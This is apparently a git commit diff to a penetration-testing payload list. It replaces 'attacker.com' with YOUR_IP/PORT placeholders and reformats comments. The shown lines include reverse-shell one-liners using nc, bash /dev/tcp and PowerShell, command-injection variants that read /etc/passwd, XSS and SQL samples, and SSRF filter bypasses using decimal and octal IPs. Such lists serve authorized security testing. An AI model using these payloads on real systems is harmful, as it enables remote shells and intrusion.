Fix code review comments: improve formatting and use placeholder values

Co-authored-by: Stalin-143 <161853795+Stalin-143@users.noreply.github.com>
2026-05-26 19:36:33 +00:00 · 2026-01-04 18:26:37 +00:00
parent ab9c127df3
commit dbf612f6b1
3 changed files with 20 additions and 18 deletions
@@ -74,7 +74,7 @@ c'a't /etc/passwd
 c"a"t /etc/passwd
 c\at /etc/passwd
-# Reverse shell payloads (for testing only)
+# Reverse shell payloads (for authorized testing only - replace YOUR_IP and PORT)
-; nc -e /bin/sh attacker.com 4444
+; nc -e /bin/sh YOUR_IP PORT
-| bash -i >& /dev/tcp/attacker.com/4444 0>&1
+| bash -i >& /dev/tcp/YOUR_IP/PORT 0>&1
-& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('attacker.com',4444);"
+& powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('YOUR_IP',PORT);"
@@ -32,18 +32,19 @@ user\x00admin
 /var/log/auth.log
 ../../../var/log/syslog
-# Events that should be logged (test if they're logged)
+# Events to test if they appear in logs
- Failed login attempts
+# Try these payloads and verify they are logged appropriately:
- Successful login
+# - Failed login attempts
- Password changes
+# - Successful login
- Privilege escalation
+# - Password changes
- Administrative actions
+# - Privilege escalation attempts
- Access to sensitive data
+# - Administrative actions
- Invalid input
+# - Access to sensitive data
- Authentication failures
+# - Invalid input
- Authorization failures
+# - Authentication failures
 # - Authorization failures
-# Events to check in logs
+# Sample payloads to check logging behavior
 SELECT * FROM users WHERE username='admin' AND password='wrong'
 <script>alert('XSS')</script>
 ../../../etc/passwd
@@ -51,9 +51,10 @@ ldap://127.0.0.1:389
 tftp://127.0.0.1:69
 # Bypassing filters
-# Using decimal IP
+# Using decimal IP (127.0.0.1 in decimal)
-http://2130706433 (127.0.0.1)
+http://2130706433
-http://3232235521 (192.168.0.1)
+# Using decimal IP (192.168.0.1 in decimal)
 http://3232235521
 # Using octal IP
 http://0177.0.0.1